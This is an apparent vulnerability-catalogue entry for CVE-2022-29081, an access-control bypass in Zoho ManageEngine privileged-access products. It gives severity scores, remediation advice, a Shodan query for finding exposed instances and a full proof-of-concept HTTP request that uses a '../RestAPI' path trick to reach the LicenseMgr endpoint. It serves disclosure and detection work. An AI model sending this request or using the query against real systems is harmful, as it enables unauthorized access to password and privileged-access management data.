| Title | Zoho ManageEngine - Access Control Bypass |
|---|---|
| Author | 0xanis |
| Severity | Critical |
| Impact | Attackers can bypass access controls on REST API endpoints, potentially leading to unauthorized data access or manipulation. |
| Remediation | Update to the latest versions of Access Manager Plus, Password Manager Pro, and PAM360 that address this issue. |
| CVSS Score | 9.8 |
| EPSS Score | 0.81477 |
| CVE ID | CVE-2022-29081 |
| CWE ID | CWE-22 |
| Shodan Query | http.title:"manageengine" |
| Tags | cve cve2022 zoho manageengine auth-bypass vkev |
Zoho ManageEngine Access Manager Plus before 4302, Password Manager Pro before 12007, and PAM360 before 5401 are vulnerable to access-control bypass on a few Rest API URLs (for SSOutAction. SSLAction. LicenseMgr. GetProductDetails. GetDashboard. FetchEvents. and Synchronize) via the ../RestAPI substring.
POST /x/..//RestAPI/LicenseMgr HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
operation=getLicenseDetails
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-29081.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-29081.pcap
N/AN/A